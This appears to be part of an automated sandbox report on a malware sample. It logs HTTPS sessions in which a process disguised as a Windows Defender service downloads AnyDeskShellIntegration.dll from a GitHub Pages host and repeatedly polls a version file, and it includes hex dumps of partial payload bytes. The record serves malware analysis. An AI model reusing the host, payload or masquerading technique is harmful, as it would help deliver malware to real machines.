                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: db 0c df 66 46 20 bd 48 39 54 1e 16 95 4a 39 7d 0f 8e e0 4c 6d 50 bd 71 4c 9d 54 e1 1e 7c cd 29 7c 56 43 58 4d 6a 6e a3 dd f7 c0 7c 56 2b 5e 0a 26 05 3e d0 59 d8 b7 b7 6a 59 05 28 04 92 91 69 99 2f 23 64 97 19 99 64 64 66 87 68 77 91 49 46 26 6a 67 6c 99 64 64 92 57 6e 47 70 49 46 26 19 37 72 27 64 64 92 91 74 17 76 07 23 87 1c 99 78 f7 69 7a e7 32 c9 c8 24 7c d7 7e 93 8c 4c 32 c7 80 b7 82 6d c3 b4 0d 3f 23 84 3f 23 36 4c db 30 86 3f 23 88 3f c3 b4 0d d3 23 8a 3f 23 8c 3f 4c db 30 6d 23 8e 3f 23 90 b4 0d d3 36 3f 23 92 3f 23 db 30 6d c3 94 3f 23 96 3f 23 86 63 37 4c 98 3f 68 23 9a 3f 98 b6 61 da 23 9c 3f 23 9e 69 1b a6 6d 3f 23 a0 3f 23 b6 61 da 86 a2 3f 23 a4 3f 23 1b a6 6d 98 a6 3f 23 a8 3f 61 da 86 69 23 aa 3f 23 ac a6 6d 98 b6 3f 23 ae 3f 23 b0 da 86
                                                                                                    Data Ascii: fF H9TJ9}LmPqLT|)|VCXMjn|V+^&>YjY(i/#dddfhwIF&jglddWnGpIF&7r'ddtv#xiz2$|~L2m?#?#6L0?#?#?#?L0m#?#6?#?#0m?#?#c7L?h#?a#?#im?#?#a?#?#m?#?ai#?#m?#?#
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 99 92 91 85 23 3c 86 47 2e 53 32 05 3e 87 e7 56 64 e4 72 24 40 88 c9 94 8c 5c a6 42 89 ab 99 92 91 cb 44 8a 8d 46 2e 53 32 72 8b 6f 48 8c c8 65 4a 46 51 4a 8d 19 b9 4c c9 33 4c 8e 15 92 23 97 29 4e 8f f7 55 53 32 72 39 50 90 d9 52 bd 2d 37 42 81 54 37 cf 8c 03 99 e4 4b d7 90 0c 58 9a 42 13 c8 90 0c ba e7 70 13 1f 9a 13 df 2c 22 01 2c 35 5e cc 7f 2b 72 01 7b 2f 5c 2e f6 5d 74 5b d5 2b 76 d4 c5 72 e9 85 78 01 ff 2f 5e ec 03 de 7a 16 bb da 8b d3 33 7c 01 62 cf d0 d5 29 7e 22 d2 29 06 b6 fc f0 80 01 6f 2b 54 33 82 72 64 4a 46 13 84 fb 53 32 25 23 47 86 e3 88 25 23 53 32 cb 8a b3 23 53 32 32 8c 9b 8e 83 f0 5a 37 25 90 16 b0 92 01 65 90 2a d6 5d d8 5c 9b e0 96 c6 09 e1 6a ba de d2 3d 57 57 c0 33 5f 54 09 64 9e 57 6c 55 74 1e 84 06 94 a4 37 5e eb a4 82 b4 04 bc
                                                                                                    Data Ascii: #<G.S2>Vdr$@\BDF.S2roHeJFQJL3L#)NUS2r9PR-7BT7KXBp,",5^+r{/\.]t[+vrx/^z3|b)~")o+T3rdJFS2%#G%#S2#S22Z7%e*]\j=WW3_TdWlUt7^
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 04 0a 16 4e 04 84 3a 58 bc ee cf 1b 8b 2b 44 8d 82 1b 44 2a 54 ed e1 e0 ae 8d 8f 60 0c 10 e1 c4 03 6f d3 8e 1c c8 1e 03 42 f0 69 05 d2 9a 4a c0 fc 90 ef cf 81 50 09 e0 d1 91 27 00 07 13 df 74 9e 9a ad 15 81 7c 92 f0 55 ae ac bc b4 b8 00 fc 00 05 35 b6 04 3b a8 a5 46 f0 b5 04 93 55 d0 a5 f5 26 fc 33 c9 ff 15 59 86 69 6b fd 04 26 19 ad c1 69 38 e4 cc 58 c0 ff ff b1 43 b2 54 41 b0 40 41 b1 45 41 b2 5d b3 56 40 b7 53 9b 61 2c e0 8a c3 ae 8c 10 c0 41 3c 4f fb ed 32 c3 88 4c 71 41 8d 43 01 30 0e 72 02 73 f3 3c cf f3 03 74 04 75 05 cf f3 3c cf 76 06 77 07 78 08 3c cf f3 3c 79 09 7a 0a 7b f3 3c cf f3 0b 7c 0c 7d 0d bf ff 3c cf 7e 0e 7f 0f 32 c8 88 4d 80 10 10 32 d0 a6 79 ff e7 88 55 81 11 44 32 c0 44 88 45 82 14 12 c8 ff d9 34 cf 4d 83 13 d0 55 84 14 32 d8 88 5d
                                                                                                    Data Ascii: N:X+DD*T`oBiJP't|U5;FU&3Yik&i8XCTA@AEA]V@Sa,A<O2LqAC0rs<tu<vwx<<yz{<|}<~2M2yUD2DE4MU2]
                                                                                                    2024-09-29 00:26:10 UTC1378INData Raw: 73 cf 12 1e 88 13 56 d0 7b 83 21 36 60 94 14 bd 84 13 01 81 f6 3d 7c 68 22 e0 3e 7d 06 69 b8 59 b8 f7 b7 da f4 12 d9 d1 d3 d8 04 78 cd 0a c1 38 cd c0 93 14 c6 ad b2 76 cd 55 c6 cb 14 76 81 9d 63 28 15 3e b0 03 80 22 02 a3 52 b4 97 ef b4 38 ac b0 b5 d8 75 3b 22 82 5f bb cb a6 bc b3 d8 74 0c 3c 7a c9 68 a5 4d be 69 b3 71 21 5b 68 1d 5d c3 24 e0 4d 47 37 8b c4 e0 0a 01 bd 76 55 81 c4 37 5d e7 5f 7b bb 87 89 0d 1e b3 15 20 0a 44 c0 25 0c 83 f9 b2 6d 77 ed 02 75 0c a8 06 14 01 eb 14 16 fa d7 c1 1a 6c b8 dd 34 04 74 1b 08 01 74 16 c0 72 b7 23 f0 6c fb 9a e1 32 ae 0e 64 1a eb 0a 52 dc d7 6b ac bb cb 83 72 f9 d7 ba 0d ff 25 83 a0 4b 48 c0 3c 5f 81 05 b0 e0 e0 45 fb b4 fc b9 03 6e f7 3e 02 97 75 2c 68 ac 9f 15 8e 58 81 e1 bd d3 16 84 43 39 4a a2 80 54 24 e0 c4 7c
                                                                                                    Data Ascii: sV{!6`=|h">}iYx8vUvc(>"R8u;"_t<zhMiq![h]$MG7vU7]_{ D%mwul4ttr#l2dRkr%KH<_En>u,hXC9JT$|


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.649717185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:26:10 UTC77OUTGET /file/AnyDeskShellIntegration.dll HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:26:11 UTC757INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 54784
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: application/octet-stream
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-d600"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:11 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: 7470:11D1CA:291C61D:2DED7D8:66F89EA2
                                                                                                    Accept-Ranges: bytes
                                                                                                    Age: 0
                                                                                                    Date: Sun, 29 Sep 2024 00:26:11 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    X-Served-By: cache-ewr-kewr1740049-EWR
                                                                                                    X-Cache: MISS
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1727569571.017791,VS0,VE21
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 28491f51a49b73e41d58b986cb30543cadff6f25
                                                                                                    2024-09-29 00:26:11 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 74 6e 1d 65 30 0f 73 36 30 0f 73 36 30 0f 73 36 7b 77 70 37 35 0f 73 36 7b 77 76 37 b6 0f 73 36 7b 77 77 37 3a 0f 73 36 20 8b 70 37 39 0f 73 36 20 8b 77 37 3e 0f 73 36 20 8b 76 37 10 0f 73 36 7b 77 72 37 33 0f 73 36 30 0f 72 36 69 0f 73 36 78 8a 7a 37 32 0f 73 36 78 8a 8c 36 31 0f 73 36 30 0f e4 36 31 0f 73 36 78 8a 71 37 31 0f 73 36 52 69 63 68 30 0f 73 36 00 00 00 00 00 00 00
                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$tne0s60s60s6{wp75s6{wv7s6{ww7:s6 p79s6 w7>s6 v7s6{wr73s60r6is6xz72s6x61s6061s6xq71s6Rich0s6
                                                                                                    2024-09-29 00:26:11 UTC1378INData Raw: b0 7f 0d 3c 40 32 c2 25 b8 7f 30 5f c3 ff c8 89 05 bc 18 19 20 16 1f be 87 df 4a b4 75 33 3a 54 ff f4 09 dc 83 be ed 60 dd 25 32 17 00 c6 33 d2 54 cf 6a 1c 16 b0 ff 16 a1 d8 29 84 8b c3 eb a6 80 81 de f0 df b6 66 c4 82 58 20 4c 89 40 18 89 50 9b 48 08 56 57 1b 86 b7 11 9c 40 dc f0 8b fa 9e 05 75 fe 1f 6d f7 0f 39 15 3c 7f 7f 07 96 1e 3e 8d 42 ff 83 f8 01 77 ff 86 c3 d6 9e b0 74 4d 62 05 8d 58 01 eb 08 ff 15 3e dc 15 da dc df 0f 32 d4 30 85 db cf 03 34 d3 ed 0c 1b 2c 8b d7 29 71 00 3c 1a 44 9f 35 0e 49 c0 4e fd 7f 1a 83 ff 01 33 5f 73 dd 75 36 4f 32 1b be 1b 32 61 b2 39 9c 63 f6 4c 41 48 73 00 7b b3 0d 7b 74 0e 23 76 65 85 ff 74 05 3e 6c 77 02 7b 03 75 3c 71 74 25 39 c6 e0 ad 93 6d c3 06 10 27 3e 26 b5 eb 68 1e 0a ef 06 33 db 07 28 80 78 40 1e 96 51 58 b3
                                                                                                    Data Ascii: <@2%0_ Ju3:T`%23Tj)fX L@PHVW@um9<>BwtMbX>204,)q<D5IN3_su6O22a9cLAHs{{t#vet>lw{u<qt%9m'>&h3(x@QX
                                                                                                    2024-09-29 00:26:11 UTC1378INData Raw: b8 40 83 04 df ae b9 03 2d de b1 37 b9 50 b7 f6 41 b8 d0 04 10 cb fc 0e 47 e0 86 d9 2c 55 61 9d e8 3f 95 d8 de 08 98 70 1c 17 41 43 19 b1 d8 c3 ea 47 3c d1 8d e0 1d 24 af b7 69 59 d5 dc 8d e8 18 d7 b1 27 ba 58 59 08 20 64 0a 5a 7b 0d 1e e7 85 c8 04 d2 03 66 88 41 8c b6 d8 14 8b 98 cb 17 c1 86 fd 33 85 88 00 96 31 34 d8 ce d1 6d 60 c7 03 50 15 16 07 54 01 db 6f 03 2d dc 0e 53 27 3e 8d 44 50 b3 db f7 13 3d 8d 45 f0 08 48 1c a9 d4 69 c0 d4 61 b6 40 0a 96 7a 0d 65 78 8b 50 d8 bb 8d e3 02 5a 9c 24 d0 49 e8 b3 60 29 30 c4 5d c3 fb e4 7e 70 13 1c 1d eb 55 c5 3d e4 06 be db e7 a8 f4 55 fb 06 49 8c d6 a3 c3 61 a7 49 5f 3b df 72 e9 95 8b 3b 21 43 72 72 bf b8 50 7a 06 be 08 4f c2 2c 43 30 02 87 ce 26 55 f3 ef 10 fe 5b e3 ad 7b de 0f a2 44 d6 02 d2 41 81 f2 69 6e 65
                                                                                                    Data Ascii: @-7PAG,Ua?pACG<$iY'XY dZ{fA314m`PTo-S'>DP=EHia@zexPZ$I`)0]~pU=UIaI_;r;!CrrPzO,C0&U[{DAine
                                                                                                    2024-09-29 00:26:11 UTC1378INData Raw: 35 c9 80 63 9d 78 48 8b ff e2 d3 07 2f bc 7d d4 34 07 50 58 eb 52 39 1a 74 82 04 8b 0b 5d 52 3a d2 4f 8d 42 45 6a b1 dd 2e 58 eb f6 33 63 02 6d c1 b6 2e b4 8d df 10 7c 16 4c 63 4a 26 63 26 9d 0c 09 06 6f 2c dc 0b 04 0a cf c1 a7 c0 c3 cc d7 b7 f6 bb 03 8b 39 5a 81 3f 52 43 43 e0 52 07 4d 4f 3a f6 af 34 0a da 74 22 eb 13 74 83 78 83 2d 62 97 a6 7e 08 0a 88 30 e3 dd b3 19 1c 33 c0 e5 94 89 78 48 5b 8c 54 0b 66 21 e8 33 b8 2d 90 e2 25 4b 45 b8 1f 85 91 60 94 0f 8f 89 70 db 74 78 d3 18 44 52 10 49 c7 c1 62 31 13 7c 29 44 08 49 11 7a 33 c3 d5 a7 0b 3f ad ce c1 15 7e 1c 89 b1 18 b0 7a c2 74 23 69 89 8e d9 09 be fb 3b 48 10 72 06 05 08 76 07 b9 0d da 49 2f 54 38 bc af 8d af 8c 20 7d 01 18 33 b6 72 28 93 05 8d 0a a3 0d fc 84 8b 8b 0d 74 6c 4d f9 ff e5 3d 65 b6 5d
                                                                                                    Data Ascii: 5cxH/}4PXR9t]R:OBEj.X3cm.|LcJ&c&o,9Z?RCCRMO:4t"tx-b~03xH[Tf!3-%KE`ptxDRIb1|)DIz3?~zt#i;HrvI/T8 }3r(tlM=e]
                                                                                                    2024-09-29 00:26:11 UTC1378INData Raw: 61 18 10 bc 95 82 c0 6e 18 a7 3f 40 60 73 45 42 e0 c0 13 68 87 05 2c d8 92 a3 4b 60 ff 45 a8 c9 80 17 68 0f 88 40 0d 34 1c 68 37 70 e9 68 20 52 5c 27 59 08 43 4a 08 92 3d 58 a4 45 4b 8b 5d 38 40 2e da a2 c1 7a 4f 0a cf 5a 89 96 6e 8a 11 59 03 50 60 e1 88 90 d2 17 07 c3 75 8d 34 20 fb 7d 0a d2 2e 30 2d f4 aa a7 8b 74 1b 48 4a 02 f8 a7 20 8a ad 6e f0 42 c2 3d 1b d4 99 49 83 14 c6 b7 57 af 4d 86 c6 05 84 ff c8 a1 98 7b e0 d3 d6 90 2b c6 9f 1c ae 2d 85 08 de 1d 8f bd b0 4d 3b c1 11 a6 8b 75 3c 9c f7 b0 26 df 1e db 1e 63 0b 2b de 22 ed eb 6b 48 bc f7 98 02 c1 ad b6 13 50 22 cf 61 00 08 ae 0e 12 77 f0 a5 c4 00 8d 75 7e 7f 81 fb 97 70 0d 2e 57 75 2d 44 8d 43 07 25 83 52 31 d8 dc dc d6 cc 96 cc 56 a2 98 ab 16 cc 3d b7 37 d8 66 b7 5d 46 10 c6 af 6b d3 87 84 7b b1
                                                                                                    Data Ascii: an?@`sEBh,K`Eh@4h7ph R\'YCJ=XEK]8@.zOZnYP`u4 }.0-tHJ nB=IWM{+-M;u<&c+"kHP"awu~p.Wu-DC%R1V=7f]Fk{
                                                                                                    2024-09-29 00:26:11 UTC1378INData Raw: 02 9c ee 49 5a 83 60 1a 0f 33 b0 33 d1 55 ac 15 f7 0b 34 80 ae 6d 3a 52 c7 27 e2 aa 27 be 31 72 97 dd 76 6c 2a 46 de 45 c8 03 7d c0 e0 27 5d c8 da 90 55 09 e0 1a 7f ea 08 df b6 0c 84 86 09 26 85 8b 85 a1 8d 55 05 db 42 45 c7 e1 e0 53 ce 4a ed b6 7a 43 6f c6 70 18 14 32 6e 6f 4b d5 13 cf c1 03 73 d8 08 04 7e c0 be f0 fe a6 ce 4d d0 3b 45 f8 0f 83 40 67 7d d8 66 49 4e 2d 74 d4 16 fb 4d 38 8b fe d5 36 01 df 4e 63 50 10 41 81 0c 80 b6 68 d0 de 68 66 98 04 8a 41 46 ca 97 7a db 05 43 00 10 26 b8 45 7a 45 a8 77 ad ae a1 41 4a 8f 44 78 87 11 48 c1 e8 e0 c6 ec 56 3f 3b f0 11 70 4e 08 bd 2d 36 5b fd e4 74 1d 37 98 21 ae 83 27 d0 e9 90 2a 26 68 2b a4 57 ac db 12 b8 81 4b 4a 81 5a 45 10 5a d8 6e 3b 18 4b 6c c0 04 87 51 0c 48 c2 f6 cd 2d fb 91 70 18 14 b4 2c 10 eb 31
                                                                                                    Data Ascii: IZ`33U4m:R''1rvl*FE}']U&UBESJzCop2noKs~M;E@g}fIN-tM86NcPAhhfAFzC&EzEwAJDxHV?;pN-6[t7!'*&h+WKJZEZn;KlQH-p,1
                                                                                                    2024-09-29 00:26:11 UTC1378INData Raw: db 08 4e 55 38 4f 30 84 2c 35 be d4 62 51 ff 03 d2 74 40 05 11 a8 30 15 e1 09 ed 8b 84 0c 28 a8 8f 1c 3d 30 76 a4 a0 31 52 34 cc 1b d9 cf 7b c2 a7 25 78 12 6b c2 b4 10 3e ab cc 45 0a 06 2d 81 3d 47 ec 16 09 17 40 61 37 8a 84 62 d5 ce 45 62 88 66 3b 88 23 3c ad 68 c5 61 dc 60 de ac ea ba 6a c5 6b 18 b0 25 7b 62 e3 c5 86 c6 90 8a 37 22 2b bc 1a de 0d 18 6f 48 80 8d 0d cd c5 b4 57 4b 35 b6 2e a3 0b 0c 53 55 88 08 9b 82 53 5b b4 02 d9 dc e0 c5 62 1b 52 7c b3 03 b1 05 61 b1 dd d8 26 dc 05 d8 17 41 2e 05 bd 0a 42 a6 6c 07 91 c1 c3 5b 71 90 6d 59 b1 03 43 49 18 48 b5 7b 83 c1 08 a5 36 5c 1f bb df 01 23 cf 05 1f 29 8b f9 2c 8b da 11 5e fa 7c 2e e8 f6 c3 56 0d ba 18 29 08 06 e9 47 69 ca 44 41 c7 81 d4 65 c9 d5 00 40 be 0f 16 fa a2 f7 f9 ad ff 77 4d 1c eb 02 94 21
                                                                                                    Data Ascii: NU8O0,5bQt@0(=0v1R4{%xk>E-=G@a7bEbf;#<ha`jk%{b7"+oHWK5.SUS[bR|a&A.Bl[qmYCIH{6\#),^|.V)GiDAe@wM!
                                                                                                    2024-09-29 00:26:11 UTC1378INData Raw: 3b 4c a1 c3 58 0c fa df 03 35 6d a9 b8 fd 6d ba 2b da 56 96 3e f1 85 3d 03 ab 54 b0 95 50 0f 75 df 37 3e 7f 33 58 37 53 25 43 14 30 52 5e 47 27 05 d3 7d b0 ce 2d bf c2 b7 0b 47 eb d9 33 c0 58 0a de 81 49 b8 b5 df 03 99 a0 42 83 8e a8 76 e8 18 1c 61 d3 f2 4e 4d a8 70 d1 20 b4 86 e1 1f de de 3d b1 d0 55 02 81 9d 49 45 0d 39 38 74 04 5b 73 d5 2a ce 0c 72 f3 7b e3 5b 20 78 3a e4 1c 40 08 4d 08 be 11 7c a9 db fa f8 05 75 0a 3f 08 41 8d 40 5d 54 e8 b6 e1 cd 0f 01 65 b3 c2 89 16 d8 6d 33 6b 86 73 08 a7 04 aa ab 8d 30 f4 39 2a a0 16 91 7a bd b9 ee f6 eb 08 33 49 08 10 10 fa 6b 81 38 8d 66 5b 68 b4 13 c0 a1 e2 7a 0a 8e cb b3 3c db 74 6b 07 8f 5c 90 4d 91 3c cb b3 3c 3e 92 2f 93 20 6f 99 a5 b9 b4 02 11 b5 9b 75 40 ba 9f 9f bf bf 8d 60 36 ba 8e 06 2f ba 85 28 ba 8a
                                                                                                    Data Ascii: ;LX5mm+V>=TPu7>3X7S%C0R^G'}-G3XIBvaNMp =UIE98t[s*r{[ x:@M|u?A@]Tem3ks09*z3Ik8f[hz<tk\M<<>/ ou@`6/(
                                                                                                    2024-09-29 00:26:11 UTC1378INData Raw: 15 42 0c 42 c3 ea 58 29 a4 8b c7 d7 c2 b2 88 55 84 4f 7e e1 2b 0c b7 49 3d 41 50 73 4f 62 45 18 6c 17 04 70 e4 fd 0c 5f 08 3d 7b a2 46 a2 31 b1 40 34 1a 77 6e bb a3 0d eb 0e 48 d6 1c 3c 06 fd 52 01 2c ba 59 b0 00 2b 26 bd c7 7b 83 10 56 0c 77 be df 80 12 80 a8 ae 8a 16 eb 25 1f aa 25 e8 80 fa 3d 3e 01 9b 8b c8 d0 68 81 1e 74 14 41 72 dd 96 6a 34 d5 f6 c0 60 03 0c 8a 10 c3 d8 b0 41 50 d7 02 ba 08 70 b7 2e d8 60 ab 0b 7f c8 72 4f f3 8a 68 6b b6 a6 06 59 5f 43 cd c5 42 2e 60 27 fc f6 b5 08 3c 3d 74 35 ba ea cd 3c 46 4f f0 c0 f8 19 25 30 d5 bf 3b 4b 5d 1b 4a 50 47 f6 3e d5 76 b0 67 3f 03 f5 eb ac da 41 44 69 eb 8d f2 9d a7 07 48 95 40 5b 48 08 f5 c1 34 65 7c 75 5e c3 e6 3e 4e 18 82 d1 5d d2 78 4c 18 45 82 57 17 01 a8 e5 66 8f f9 eb 0f 83 54 c5 19 0d e1 6b 71
                                                                                                    Data Ascii: BBX)UO~+I=APsObElp_={F1@4wnH<R,Y+&{Vw%%=>htArj4`APp.`rOhkY_CB.`'<=t5<FO%0;K]JPG>vg?ADiH@[H4e|u^>N]xLEWfTkq
                                                                                                    2024-09-29 00:26:11 UTC1378INData Raw: 99 36 01 0d 89 90 28 f6 77 d8 a8 03 17 88 b5 8d 4a 42 0d 54 37 bb dd e1 28 66 11 bc 00 1c 0a c2 d2 9f 29 e0 ac ae 1d 83 a0 a0 94 bd 9d eb 0e 48 70 9c d0 97 84 55 d4 20 b2 a8 48 f0 14 f0 53 7f 09 bd 24 e8 1a 53 4a 8c 0b 37 58 24 28 6f f3 40 c7 5f 88 67 5d e8 f7 e8 d3 15 84 63 b8 05 00 00 71 0b d8 65 ed e8 e5 d7 45 e4 dd 4d 42 8f b9 c2 74 0c 6f 8b 3c 8b 49 70 81 1c c8 81 0c 58 60 c8 81 1c c8 68 48 50 81 fd 80 1c 78 89 80 00 00 00 0f 06 e1 10 e4 c0 03 a3 06 28 d0 34 dd 41 49 38 14 e0 f8 e4 56 34 41 87 1b b0 c6 5d 13 c1 f8 15 43 f9 fd 89 90 38 1b c5 ba ba 2c 29 89 5a 8f 10 00 31 cf 68 a2 9a 50 17 df 3a 41 0b 83 57 1f 14 82 79 eb 44 87 9f 38 48 d4 59 9f 37 db b4 87 3c ea 49 54 c2 53 ff 94 34 67 c5 6e 0c 95 2a 21 74 f4 14 1d 66 c7 c8 6c 17 7c d4 74 fc 3e 60 25
                                                                                                    Data Ascii: 6(wJBT7(f)HpU HS$SJ7X$(o@_g]cqeEMBto<IpX`hHPx(4AI8V4A]C8,)Z1hP:AWyD8HY7<ITS4gn*!tfl|t>`%


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.649721185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:26:17 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:26:17 UTC732INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:17 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: 9139:1C52C8:26F8EF8:2B104B9:66F89EA8
                                                                                                    Accept-Ranges: bytes
                                                                                                    Age: 0
                                                                                                    Date: Sun, 29 Sep 2024 00:26:17 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    X-Served-By: cache-nyc-kteb1890048-NYC
                                                                                                    X-Cache: MISS
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1727569578.623912,VS0,VE17
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 5465b0cae81f53faab8a5b16b412c67df8931220
                                                                                                    2024-09-29 00:26:17 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.649724185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:26:24 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:26:24 UTC752INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Sun, 29 Sep 2024 00:26:24 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 15
                                                                                                    X-Served-By: cache-ewr-kewr1740075-EWR
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 1
                                                                                                    X-Timer: S1727569585.674287,VS0,VE1
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 2a8a999cf039af73ede26400d4de8698ccc5bb29
                                                                                                    2024-09-29 00:26:24 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    8192.168.2.649725185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:26:31 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:26:31 UTC752INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Sun, 29 Sep 2024 00:26:31 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 22
                                                                                                    X-Served-By: cache-ewr-kewr1740076-EWR
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 1
                                                                                                    X-Timer: S1727569591.168550,VS0,VE1
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: f79995bf2da94dd4c690d85d123da043dd5fa263
                                                                                                    2024-09-29 00:26:31 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    9192.168.2.649726185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:26:37 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:26:37 UTC752INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Sun, 29 Sep 2024 00:26:37 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 28
                                                                                                    X-Served-By: cache-ewr-kewr1740067-EWR
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 1
                                                                                                    X-Timer: S1727569598.628852,VS0,VE2
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: c7c79f1c9c0b048471508cd25718c5ee52aa9709
